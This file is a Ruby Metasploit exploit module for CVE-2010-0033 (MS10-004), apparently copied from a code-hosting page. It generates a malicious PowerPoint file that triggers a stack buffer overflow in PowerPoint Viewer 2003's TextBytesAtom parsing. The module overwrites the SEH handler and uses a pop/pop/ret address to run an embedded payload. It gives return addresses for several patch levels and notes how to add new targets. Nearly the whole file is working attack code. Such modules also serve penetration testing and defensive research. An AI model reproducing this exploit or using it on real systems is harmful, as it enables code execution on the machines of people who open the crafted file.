265 lines
7.9 KiB
Ruby
265 lines
7.9 KiB
Ruby
##
|
|
# This module requires Metasploit: http//metasploit.com/download
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
##
|
|
|
|
require 'msf/core'
|
|
require 'rex/ole'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = GoodRanking
|
|
|
|
include Msf::Exploit::FILEFORMAT
|
|
include Msf::Exploit::Remote::Seh
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow',
|
|
'Description' => %q{
|
|
This module exploits a stack buffer overflow vulnerability in the handling of
|
|
the TextBytesAtom records by Microsoft PowerPoint Viewer. According to Microsoft,
|
|
the PowerPoint Viewer distributed with Office 2003 SP3 and earlier, as well as
|
|
Office 2004 for Mac, are vulnerable.
|
|
|
|
NOTE: The vulnerable code path is not reachable on versions of Windows prior to
|
|
Windows Vista.
|
|
},
|
|
'License' => MSF_LICENSE,
|
|
'Author' =>
|
|
[
|
|
'SkD', # original discovery
|
|
'Snake', # PoC
|
|
'jduck' # metasploit version
|
|
],
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2010-0033' ],
|
|
[ 'OSVDB', '62241' ],
|
|
[ 'MSB', 'MS10-004' ],
|
|
[ 'ZDI', '10-017' ],
|
|
[ 'URL', 'http://www.snoop-security.com/blog/index.php/2010/03/exploiting-ms10-004-ppt-viewer/' ]
|
|
],
|
|
'DefaultOptions' =>
|
|
{
|
|
'EXITFUNC' => 'process',
|
|
'DisablePayloadHandler' => 'true',
|
|
},
|
|
'Payload' =>
|
|
{
|
|
'Space' => 1024,
|
|
'BadChars' => "\x00",
|
|
'DisableNops' => true # no need
|
|
},
|
|
'Platform' => 'win',
|
|
'Targets' =>
|
|
[
|
|
# Tested with various patch levels of PowerPoint Viewer 2003 (v6.0.2600.0)
|
|
[ 'Microsoft PowerPoint Viewer 2003',
|
|
{
|
|
'SEHOffset' => 132,
|
|
'PopPopRet' => 0x30056471 # pop/pop/ret from PPTVIEW.exe v11.0.5703.0
|
|
}
|
|
],
|
|
|
|
[ 'Microsoft PowerPoint Viewer 2003 (kb949041 or kb956500) or Office 2003 SP3',
|
|
{
|
|
'SEHOffset' => 132,
|
|
'PopPopRet' => 0x3003c767 # pop/pop/ret from PPTVIEW.exe v11.0.8164.0
|
|
}
|
|
],
|
|
|
|
=begin
|
|
#
|
|
# This is commented out because of ASLR. gdiplus is no good.
|
|
#
|
|
[ 'Microsoft PowerPoint Viewer 2003 (kb956500 or kb969615)',
|
|
{
|
|
'SEHOffset' => 132,
|
|
#'PopPopRet' => 0x39827475 # pop/pop/ret from gdiplus.dll v11.0.8230.0
|
|
'PopPopRet' => 0x69647475
|
|
}
|
|
],
|
|
=end
|
|
|
|
[ 'Microsoft PowerPoint Viewer 2003 (kb969615)',
|
|
{
|
|
'SEHOffset' => 132,
|
|
'PopPopRet' => 0x300566d1 # pop/pop/ret from PPTVIEW.exe v11.0.8305.0
|
|
}
|
|
],
|
|
|
|
#
|
|
# All that is needed for new targets are the two vars! msfpescan will help.
|
|
#
|
|
|
|
# crash on a deref path to heaven.
|
|
[ 'Crash Target for Debugging',
|
|
{
|
|
'SEHOffset' => 132,
|
|
'PopPopRet' => 0xdac0ffee
|
|
}
|
|
]
|
|
],
|
|
'DisclosureDate' => 'Feb 09 2010'))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('FILENAME', [ true, 'The file name.', 'msf.ppt']),
|
|
OptString.new('OUTPUTPATH', [ true, 'Path to output the file', Msf::Config.local_directory ])
|
|
], self.class)
|
|
end
|
|
|
|
def ppt_record(tag, data=nil, ver=0, inst=0)
|
|
data ||= ''
|
|
ret = ''
|
|
verinst = (ver & 0xf) | (inst << 4)
|
|
ret << [verinst, tag, data.length].pack('vvV')
|
|
ret << data
|
|
ret
|
|
end
|
|
|
|
def exploit
|
|
|
|
print_status("Creating PowerPoint Document ...")
|
|
|
|
username = Rex::Text.rand_text_alphanumeric(8+rand(8))
|
|
|
|
# smash the stack, hit SEH, use the pop-pop-ret to execute code on the stack
|
|
sploit = rand_text(target['SEHOffset'])
|
|
sploit << generate_seh_record(target['PopPopRet'])
|
|
# jump ahead into the next atom
|
|
distance = 10
|
|
sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $+" + distance.to_s).encode_string
|
|
|
|
# TextBytesAtom
|
|
text_bytes_atom = ppt_record(0xfa8, sploit)
|
|
text_bytes_atom[4,4] = [0xffffffff].pack('V') # ..f8 thru ..ff
|
|
#text_bytes_atom << ppt_record(0xfa8, "\xcc" + ("A" * 2046) + "\xcc")
|
|
text_bytes_atom << ppt_record(0xfa8, ("A" * 16) + payload.encoded)
|
|
|
|
|
|
# SlidePersistAtom
|
|
spa1_data = [2,0,0,0x80000000,0].pack('VVVVV')
|
|
spa1 = ppt_record(0x3f3, spa1_data)
|
|
|
|
# SlideListWithText (first)
|
|
slwt1 = ppt_record(0xff0, spa1, 15, 1)
|
|
|
|
# SlidePersistAtom
|
|
spa2_data = ''
|
|
spa2_data << [3,0,2,0x100,0].pack('VVVVV')
|
|
|
|
# SlideListWithText container (2nd)
|
|
slwt2_data = ''
|
|
slwt2_data << ppt_record(0x3f3, spa2_data)
|
|
# TextHeaderAtom
|
|
txt_hdr_data = [6].pack('V') # textType
|
|
slwt2_data << ppt_record(0xf9f, txt_hdr_data)
|
|
slwt2_data << text_bytes_atom
|
|
slwt2 = ppt_record(0xff0, slwt2_data, 15)
|
|
|
|
|
|
# Document container
|
|
doc_data = ''
|
|
doc_data << slwt1
|
|
doc_data << slwt2
|
|
doc = ppt_record(0x3e8, doc_data, 15)
|
|
|
|
|
|
# MainMaster container
|
|
mdc_data = ppt_record(0xf003, '', 15)
|
|
ppd_data = ppt_record(0xf002, mdc_data, 15)
|
|
|
|
# TextMasterStyleAtom
|
|
tmsa_data = [0].pack('v') # cLevels (none)
|
|
|
|
mm_data = ''
|
|
mm_data << ppt_record(0xfa3, tmsa_data)
|
|
mm_data << ppt_record(0x40c, ppd_data, 15)
|
|
mm = ppt_record(0x3f8, mm_data, 15)
|
|
|
|
|
|
# assembled stream contents
|
|
content = ''
|
|
|
|
document_offset = content.length
|
|
content << doc
|
|
|
|
main_master_offset = content.length
|
|
content << mm
|
|
|
|
# PersistPtrIncrementalBlock
|
|
start_num = 1
|
|
count = 2
|
|
ppib_data = [(start_num & 0xfffff) | (count << 20)].pack('V')
|
|
ppib_data << [document_offset].pack('V')
|
|
ppib_data << [main_master_offset].pack('V')
|
|
ppib = ppt_record(0x1772, ppib_data)
|
|
|
|
# Store offset and add it
|
|
persist_ptr_incremental_block_offset = content.length
|
|
content << ppib
|
|
|
|
# UserEditAtom
|
|
uea_data = ''
|
|
uea_data << [0x100].pack('V') # lastSlideIdRef
|
|
uea_data << [0x1599,0,3].pack('vCC') # version, minorVer, majorVer
|
|
uea_data << [0].pack('V') # offsetLastEdit
|
|
uea_data << [persist_ptr_incremental_block_offset].pack('V')
|
|
uea_data << [1].pack('V') # docPersistIdRef
|
|
uea_data << [3].pack('V') # persistIdSeed
|
|
uea_data << [1].pack('v') # lastView
|
|
uea_data << [0x31c5].pack('v') # unused??
|
|
uea = ppt_record(0xff5, uea_data)
|
|
|
|
# Store offset and add it
|
|
user_edit_atom_offset = content.length
|
|
content << uea
|
|
|
|
|
|
# Create the output file
|
|
out = File.join(datastore['OUTPUTPATH'], datastore['FILENAME'])
|
|
stg = Rex::OLE::Storage.new(out, Rex::OLE::STGM_WRITE)
|
|
if (not stg)
|
|
fail_with(Failure::Unknown, 'Unable to create output file')
|
|
end
|
|
|
|
# PowerPoint Document stream
|
|
stm = stg.create_stream("PowerPoint Document")
|
|
if (not stm)
|
|
fail_with(Failure::Unknown, 'Unable to create "PowerPoint Document" stream')
|
|
end
|
|
stm << content
|
|
stm.close
|
|
|
|
|
|
# CurrentUserAtom stream
|
|
cua_data = ''
|
|
cua_data << [0x14].pack('V') # size
|
|
cua_data << [0xe391c05f].pack('V') # headerToken (not encrypted)
|
|
cua_data << [user_edit_atom_offset].pack('V')
|
|
cua_data << [username.length].pack('v')
|
|
cua_data << [0x3f4].pack('v') # docFileVersion
|
|
cua_data << [3,0].pack('CC') # majorVer, minorVer
|
|
cua_data << [0x3b].pack('v') # unused??
|
|
cua_data << username
|
|
cua_data << [8].pack('V') # relVersion (1 master slide)
|
|
cua_data << Rex::Text.to_unicode(username)
|
|
|
|
current_user_stream = ppt_record(0xff6, cua_data)
|
|
|
|
stm = stg.create_stream("Current User")
|
|
if (not stm)
|
|
fail_with(Failure::Unknown, 'Unable to create "Current User" stream')
|
|
end
|
|
stm << current_user_stream
|
|
stm.close
|
|
|
|
stg.close
|
|
|
|
print_status("Generated output file #{out}")
|
|
|
|
end
|
|
|
|
end
|